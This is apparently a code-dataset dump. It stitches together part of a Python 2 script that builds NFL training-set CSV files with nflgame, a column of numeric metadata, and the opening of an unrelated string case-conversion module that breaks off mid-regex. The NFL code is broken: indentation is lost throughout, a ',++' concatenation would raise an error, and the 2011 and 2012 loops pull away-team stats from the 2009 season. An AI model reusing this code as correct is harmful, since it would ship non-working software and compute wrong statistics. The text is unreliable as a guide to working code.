print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'Compiling traing set for 2011 NFL season...'
season2009 = nflgame.games_gen(2011, kind="REG")
f = open('nfl2011ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2011, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'Compiling traing set for 2012 NFL season...'
season2009 = nflgame.games_gen(2012, kind="REG")
f = open('nfl2012ts_tanh_scrubbed-14i-v1.1.csv','w')
result = ''
exampleCount = 0
for g in season2009:
HT_AVG = nflgame.games_gen(2012, home=g.home, away=g.home, kind="REG") #get all games played by HOME team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
HT_YPG = 0
HT_PPG = 0
HT_YPGA = 0
HT_PPGA = 0
#HT_TOpm = 0
HT_TO = 0
HT_TA = 0
HT_QByds = 0
HT_QBatt = 0
HT_QBcomp = 0
HT_QBtd = 0
HT_QBint = 0
HT_QBR = 0
HT_WL = 0
count = 0
for h in HT_AVG:
if h.home==g.home:
HT_YPG += h.stats_home.total_yds
HT_PPG += h.score_home
#HT_TOpm = h.stats_away.turnovers - h.stats_home.turnovers
HT_TO += h.stats_home.turnovers
HT_TA += h.stats_away.turnovers
HT_YPGA += h.stats_away.total_yds
HT_PPGA += h.score_away
qb = h.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
else:
HT_YPG += h.stats_away.total_yds
HT_PPG += h.score_away
#HT_TOpm = h.stats_home.turnovers - h.stats_away.turnovers
HT_TO += h.stats_away.turnovers
HT_TA += h.stats_home.turnovers
HT_YPGA += h.stats_home.total_yds
HT_PPGA += h.score_home
qb = h.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
HT_QByds += p.passing_yds
HT_QBatt += p.passing_att
HT_QBcomp += p.passing_cmp
HT_QBtd += p.passing_tds
HT_QBint += p.passing_ints
count += 1
HT_TO = HT_TO / Decimal(count)
HT_TA = HT_TA / Decimal(count)
HT_YPG = HT_YPG / count
HT_PPG = HT_PPG / Decimal(count)
HT_PPG = Decimal(str(HT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_YPGA = HT_YPGA / count
HT_PPGA = HT_PPGA / Decimal(count)
HT_PPGA = Decimal(str(HT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
HT_QBR = Decimal(HT_QBcomp) / Decimal(HT_QBatt)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = (HT_QBR - 30) * Decimal(0.05)
HT_QBR += ((HT_QByds / HT_QBatt) - 3) * Decimal(0.25)
HT_QBR += (HT_QBtd / HT_QBatt) * Decimal(0.2)
HT_QBR += Decimal(2.375) - ((HT_QBint / HT_QBatt) * Decimal(0.25))
HT_QBR = HT_QBR / Decimal(6)
HT_QBR = HT_QBR * Decimal(100)
HT_QBR = Decimal(str(HT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_home > g.score_away:
HT_WL = 1
elif g.score_home < g.score_away:
HT_WL = -1
#############
AT_AVG = nflgame.games_gen(2009, home=g.away, away=g.away, kind="REG") #get all games played by AWAY team of present game before current week
#compile average stats for for HOME team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
AT_YPG = 0
AT_PPG = 0
AT_YPGA = 0
AT_PPGA = 0
#AT_TOpm = 0
AT_TO = 0
AT_TA = 0
AT_QByds = 0
AT_QBatt = 0
AT_QBcomp = 0
AT_QBtd = 0
AT_QBint = 0
AT_QBR = 0
AT_WL = 0
count = 0
for a in AT_AVG:
if a.home==g.away:
AT_YPG += a.stats_home.total_yds
AT_PPG += a.score_home
#AT_TOpm = a.stats_away.turnovers - a.stats_home.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_away.total_yds
AT_PPGA += a.score_away
qb = a.players.passing().filter(home=True).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
else:
AT_YPG += a.stats_away.total_yds
AT_PPG += a.score_away
#AT_TOpm = a.stats_home.turnovers - a.stats_away.turnovers
AT_TO += a.stats_home.turnovers
AT_TA += a.stats_away.turnovers
AT_YPGA += a.stats_home.total_yds
AT_PPGA += a.score_home
qb = a.players.passing().filter(home=False).sort('passing_att').limit(1)
for p in qb:
AT_QByds += p.passing_yds
AT_QBatt += p.passing_att
AT_QBcomp += p.passing_cmp
AT_QBtd += p.passing_tds
AT_QBint += p.passing_ints
count += 1
AT_TO = AT_TO / Decimal(count)
AT_TA = AT_TA / Decimal(count)
AT_YPG = AT_YPG / count
AT_PPG = AT_PPG / Decimal(count)
AT_PPG = Decimal(str(AT_PPG)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_YPGA = AT_YPGA / count
AT_PPGA = AT_PPGA / Decimal(count)
AT_PPGA = Decimal(str(AT_PPGA)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
AT_QBR = Decimal(AT_QBcomp) / Decimal(AT_QBatt)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = (AT_QBR - 30) * Decimal(0.05)
AT_QBR += ((AT_QByds / AT_QBatt) - 3) * Decimal(0.25)
AT_QBR += (AT_QBtd / AT_QBatt) * Decimal(0.2)
AT_QBR += Decimal(2.375) - ((AT_QBint / AT_QBatt) * Decimal(0.25))
AT_QBR = AT_QBR / Decimal(6)
AT_QBR = AT_QBR * Decimal(100)
AT_QBR = Decimal(str(AT_QBR)).quantize(Decimal('.01'), rounding=ROUND_DOWN)
if g.score_away > g.score_home:
AT_WL = 1
elif g.score_away < g.score_home:
AT_WL = -1
#############
#compile average stats for for AWAY team: YPG, PPG, YPGA, PPGA, TOpm, QB rating
print 'Game data for: ' + g.home + '(h)' + ' vs. ' + g.away + '(a)'
print '-----------------------------------------------------\n'
if HT_YPG > AT_YPG:
print g.home + ' ***YPG: ' + str(HT_YPG) + '\t' + g.away + ' YPG: ' + str(AT_YPG)
elif AT_YPG > HT_YPG:
print g.home + ' YPG: ' + str(HT_YPG) + '\t' + g.away + ' ***YPG: ' + str(AT_YPG)
if HT_PPG > AT_PPG:
print g.home + ' ***PPG: ' + str(HT_PPG) + '\t' + g.away + ' PPG: ' + str(AT_PPG)
elif AT_PPG > HT_PPG:
print g.home + ' PPG: ' + str(HT_PPG) + '\t' + g.away + ' ***PPG: ' + str(AT_PPG)
#if HT_TOpm > AT_TOpm:
# print g.home + ' ***TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' TO +/-: ' + str(AT_TOpm)
#elif AT_TOpm > HT_TOpm:
# print g.home + ' TO +/-: ' + str(HT_TOpm) + '\t' + g.away + ' ***TO +/-: ' + str(AT_TOpm)
if HT_TO > AT_TO:
print g.home + ' ***TOpg: ' + str(HT_TO) + '\t' + g.away + ' TOpg: ' + str(AT_TO)
elif AT_TO > HT_TO:
print g.home + ' TOpg: ' + str(HT_TO) + '\t' + g.away + ' ***TOpg: ' + str(AT_TO)
if HT_TA > AT_TA:
print g.home + ' ***TApg: ' + str(HT_TA) + '\t' + g.away + ' TApg: ' + str(AT_TA)
elif AT_TA > HT_TA:
print g.home + ' TApg: ' + str(HT_TA) + '\t' + g.away + ' ***TApg: ' + str(AT_TA)
if HT_YPGA < AT_YPGA:
print g.home + ' ***YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' YPG-A: ' + str(AT_YPGA)
elif AT_YPGA < HT_YPGA:
print g.home + ' YPG-A: ' + str(HT_YPGA) + '\t' + g.away + ' ***YPG-A: ' + str(AT_YPGA)
if HT_PPGA < AT_PPGA:
print g.home + ' ***PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' PPG-A: ' + str(AT_PPGA)
elif AT_PPGA < HT_PPGA:
print g.home + ' PPG-A: ' + str(HT_PPGA) + '\t' + g.away + ' ***PPG-A: ' + str(AT_PPGA)
if HT_QBR > AT_QBR:
print g.home + ' ***QBR: ' + str(HT_QBR) + '\t' + g.away + ' QBR: ' + str(AT_QBR)
elif AT_QBR > HT_QBR:
print g.home + ' QBR: ' + str(HT_QBR) + '\t' + g.away + ' ***QBR: ' + str(AT_QBR)
if HT_WL > AT_WL:
print '***HOME W/L: ' + str(HT_WL) + '\t' + 'AWAY W/L: ' + str(AT_WL)
elif AT_WL > HT_WL:
print 'HOME W/L: ' + str(HT_WL) + '\t' + '***AWAY W/L: ' + str(AT_WL)
print 'HOME FINAL: ' + str(g.score_home) + '\t' + 'AWAY FINAL: ' + str(g.score_away)
print '-----------------------------------------------------\n'
choice = query_yes_no("Add game as example to training set?")
if choice:
result = str(result)+str(HT_YPG/Decimal(1000))+','+ str(HT_YPGA/Decimal(1000))+','+ str(HT_TO/Decimal(10))+','+ str(HT_TA/Decimal(10))+','+ str(HT_QBR/Decimal(100))+','+ str(HT_PPG/Decimal(100))+','+ str(HT_PPGA/Decimal(100))+','+ str(AT_YPG/Decimal(1000))+','+ str(AT_YPGA/Decimal(1000))+','+ str(AT_TO/Decimal(10))+','++ str(AT_TA/Decimal(10))+','+ str(AT_QBR/Decimal(100))+','+ str(AT_PPG/Decimal(100))+','+ str(AT_PPGA/Decimal(100))+'\n'
result = str(result)+str(HT_WL)+','+ str(AT_WL)+'\n'
exampleCount += 1
TSheader = str(exampleCount)+',14,2\n'
result = str(TSheader) + str(result)
f.write(result)
print 'Done Compiling season data...'
print 'Exporting to .csv file...'
print 'All done.'
#export to .csv
#move on to next season, rinse, repeat
| 51.526995
| 457
| 0.476458
| 5,827
| 43,901
| 3.358847
| 0.033808
| 0.029634
| 0.0327
| 0.030656
| 0.951001
| 0.946403
| 0.939454
| 0.93925
| 0.93925
| 0.93925
| 0
| 0.026923
| 0.380675
| 43,901
| 851
| 458
| 51.587544
| 0.692927
| 0.07952
| 0
| 0.94186
| 0
| 0
| 0.078828
| 0.01468
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.124031
| 0.00646
| null | null | 0.122739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
d3fd9275525785d3478344cedc1e7ab74fecf268
| 31,553
|
py
|
Python
|
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
sample-files/python_sample_01.py
|
93Akkord/monaco-tm
|
cf55cd285ff9ef66d02a55a4326db630a9f76f11
|
[
"MIT"
] | null | null | null |
import re
__all__ = [
'lower_case',
'upper_case',
'no_case',
'snake_case',
'constant_case',
'kebab_case',
'camel_case'
]
LANGUAGES = {
'tr': {
'regexp': re.compile(r'\u0130|\u0049|\u0049\u0307'),
'map': {
'\u0130': '\u0069',
'\u0049': '\u0131',
'\u0049\u0307': '\u0069'
}
},
'az': {
'regexp': re.compile(r'[\u0130]'),
'map': {
'\u0130': '\u0069',
'\u0049': '\u0131',
'\u0049\u0307': '\u0069'
}
},
'lt': {
'regexp': re.compile(r'[\u0049\u004A\u012E\u00CC\u00CD\u0128]'),
'map': {
'\u0049': '\u0069\u0307',
'\u004A': '\u006A\u0307',
'\u012E': '\u012F\u0307',
'\u00CC': '\u0069\u0307\u0300',
'\u00CD': '\u0069\u0307\u0301',
'\u0128': '\u0069\u0307\u0303'
}
}
}
# @formatter:off
NON_WORD_REGEXP = re.compile(r'[^A-Za-z\xAA\xB5\xBA\xC0-\xD6\xD8-\xF6\xF8-\u02C1\u02C6-\u02D1\u02E0-\u02E4\u02EC\u02EE\u0370-\u0374\u0376\u0377\u037A-\u037D\u037F\u0386\u0388-\u038A\u038C\u038E-\u03A1\u03A3-\u03F5\u03F7-\u0481\u048A-\u052F\u0531-\u0556\u0559\u0561-\u0587\u05D0-\u05EA\u05F0-\u05F2\u0620-\u064A\u066E\u066F\u0671-\u06D3\u06D5\u06E5\u06E6\u06EE\u06EF\u06FA-\u06FC\u06FF\u0710\u0712-\u072F\u074D-\u07A5\u07B1\u07CA-\u07EA\u07F4\u07F5\u07FA\u0800-\u0815\u081A\u0824\u0828\u0840-\u0858\u08A0-\u08B4\u0904-\u0939\u093D\u0950\u0958-\u0961\u0971-\u0980\u0985-\u098C\u098F\u0990\u0993-\u09A8\u09AA-\u09B0\u09B2\u09B6-\u09B9\u09BD\u09CE\u09DC\u09DD\u09DF-\u09E1\u09F0\u09F1\u0A05-\u0A0A\u0A0F\u0A10\u0A13-\u0A28\u0A2A-\u0A30\u0A32\u0A33\u0A35\u0A36\u0A38\u0A39\u0A59-\u0A5C\u0A5E\u0A72-\u0A74\u0A85-\u0A8D\u0A8F-\u0A91\u0A93-\u0AA8\u0AAA-\u0AB0\u0AB2\u0AB3\u0AB5-\u0AB9\u0ABD\u0AD0\u0AE0\u0AE1\u0AF9\u0B05-\u0B0C\u0B0F\u0B10\u0B13-\u0B28\u0B2A-\u0B30\u0B32\u0B33\u0B35-\u0B39\u0B3D\u0B5C\u0B5D\u0B5F-\u0B61\u0B71\u0B83\u0B85-\u0B8A\u0B8E-\u0B90\u0B92-\u0B95\u0B99\u0B9A\u0B9C\u0B9E\u0B9F\u0BA3\u0BA4\u0BA8-\u0BAA\u0BAE-\u0BB9\u0BD0\u0C05-\u0C0C\u0C0E-\u0C10\u0C12-\u0C28\u0C2A-\u0C39\u0C3D\u0C58-\u0C5A\u0C60\u0C61\u0C85-\u0C8C\u0C8E-\u0C90\u0C92-\u0CA8\u0CAA-\u0CB3\u0CB5-\u0CB9\u0CBD\u0CDE\u0CE0\u0CE1\u0CF1\u0CF2\u0D05-\u0D0C\u0D0E-\u0D10\u0D12-\u0D3A\u0D3D\u0D4E\u0D5F-\u0D61\u0D7A-\u0D7F\u0D85-\u0D96\u0D9A-\u0DB1\u0DB3-\u0DBB\u0DBD\u0DC0-\u0DC6\u0E01-\u0E30\u0E32\u0E33\u0E40-\u0E46\u0E81\u0E82\u0E84\u0E87\u0E88\u0E8A\u0E8D\u0E94-\u0E97\u0E99-\u0E9F\u0EA1-\u0EA3\u0EA5\u0EA7\u0EAA\u0EAB\u0EAD-\u0EB0\u0EB2\u0EB3\u0EBD\u0EC0-\u0EC4\u0EC6\u0EDC-\u0EDF\u0F00\u0F40-\u0F47\u0F49-\u0F6C\u0F88-\u0F8C\u1000-\u102A\u103F\u1050-\u1055\u105A-\u105D\u1061\u1065\u1066\u106E-\u1070\u1075-\u1081\u108E\u10A0-\u10C5\u10C7\u10CD\u10D0-\u10FA\u10FC-\u1248\u124A-\u124D\u1250-\u1256\u1258\u125A-\u125D\u1260-\u1288\u128A-\u128D\u1290-\u12B0\u12B2-\u12B5\u12B8-\u12BE\u12C0\u12C2-\u12C5\u12C8-\u12D6\u12D8-\u1310\u1312-\u1315\u1318-\u135A\u1380-\u138F\u13A0-\u13F5\u13F8-\u13FD\u1401-\u166C\u166F-\u167F\u1681-\u169A\u16A0-\u16EA\u16F1-\u16F8\u1700-\u170C\u170E-\u1711\u1720-\u1731\u1740-\u1751\u1760-\u176C\u176E-\u1770\u1780-\u17B3\u17D7\u17DC\u1820-\u1877\u1880-\u18A8\u18AA\u18B0-\u18F5\u1900-\u191E\u1950-\u196D\u1970-\u1974\u1980-\u19AB\u19B0-\u19C9\u1A00-\u1A16\u1A20-\u1A54\u1AA7\u1B05-\u1B33\u1B45-\u1B4B\u1B83-\u1BA0\u1BAE\u1BAF\u1BBA-\u1BE5\u1C00-\u1C23\u1C4D-\u1C4F\u1C5A-\u1C7D\u1CE9-\u1CEC\u1CEE-\u1CF1\u1CF5\u1CF6\u1D00-\u1DBF\u1E00-\u1F15\u1F18-\u1F1D\u1F20-\u1F45\u1F48-\u1F4D\u1F50-\u1F57\u1F59\u1F5B\u1F5D\u1F5F-\u1F7D\u1F80-\u1FB4\u1FB6-\u1FBC\u1FBE\u1FC2-\u1FC4\u1FC6-\u1FCC\u1FD0-\u1FD3\u1FD6-\u1FDB\u1FE0-\u1FEC\u1FF2-\u1FF4\u1FF6-\u1FFC\u2071\u207F\u2090-\u209C\u2102\u2107\u210A-\u2113\u2115\u2119-\u211D\u2124\u2126\u2128\u212A-\u212D\u212F-\u2139\u213C-\u213F\u2145-\u2149\u214E\u2183\u2184\u2C00-\u2C2E\u2C30-\u2C5E\u2C60-\u2CE4\u2CEB-\u2CEE\u2CF2\u2CF3\u2D00-\u2D25\u2D27\u2D2D\u2D30-\u2D67\u2D6F\u2D80-\u2D96\u2DA0-\u2DA6\u2DA8-\u2DAE\u2DB0-\u2DB6\u2DB8-\u2DBE\u2DC0-\u2DC6\u2DC8-\u2DCE\u2DD0-\u2DD6\u2DD8-\u2DDE\u2E2F\u3005\u3006\u3031-\u3035\u303B\u303C\u3041-\u3096\u309D-\u309F\u30A1-\u30FA\u30FC-\u30FF\u3105-\u312D\u3131-\u318E\u31A0-\u31BA\u31F0-\u31FF\u3400-\u4DB5\u4E00-\u9FD5\uA000-\uA48C\uA4D0-\uA4FD\uA500-\uA60C\uA610-\uA61F\uA62A\uA62B\uA640-\uA66E\uA67F-\uA69D\uA6A0-\uA6E5\uA717-\uA71F\uA722-\uA788\uA78B-\uA7AD\uA7B0-\uA7B7\uA7F7-\uA801\uA803-\uA805\uA807-\uA80A\uA80C-\uA822\uA840-\uA873\uA882-\uA8B3\uA8F2-\uA8F7\uA8FB\uA8FD\uA90A-\uA925\uA930-\uA946\uA960-\uA97C\uA984-\uA9B2\uA9CF\uA9E0-\uA9E4\uA9E6-\uA9EF\uA9FA-\uA9FE\uAA00-\uAA28\uAA40-\uAA42\uAA44-\uAA4B\uAA60-\uAA76\uAA7A\uAA7E-\uAAAF\uAAB1\uAAB5\uAAB6\uAAB9-\uAABD\uAAC0\uAAC2\uAADB-\uAADD\uAAE0-\uAAEA\uAAF2-\uAAF4\uAB01-\uAB06\uAB09-\uAB0E\uAB11-\uAB16\uAB20-\uAB26\uAB28-\uAB2E\uAB30-\uAB5A\uAB5C-\uAB65\uAB70-\uABE2\uAC00-\uD7A3\uD7B0-\uD7C6\uD7CB-\uD7FB\uF900-\uFA6D\uFA70-\uFAD9\uFB00-\uFB06\uFB13-\uFB17\uFB1D\uFB1F-\uFB28\uFB2A-\uFB36\uFB38-\uFB3C\uFB3E\uFB40\uFB41\uFB43\uFB44\uFB46-\uFBB1\uFBD3-\uFD3D\uFD50-\uFD8F\uFD92-\uFDC7\uFDF0-\uFDFB\uFE70-\uFE74\uFE76-\uFEFC\uFF21-\uFF3A\uFF41-\uFF5A\uFF66-\uFFBE\uFFC2-\uFFC7\uFFCA-\uFFCF\uFFD2-\uFFD7\uFFDA-\uFFDC0-9\xB2\xB3\xB9\xBC-\xBE\u0660-\u0669\u06F0-\u06F9\u07C0-\u07C9\u0966-\u096F\u09E6-\u09EF\u09F4-\u09F9\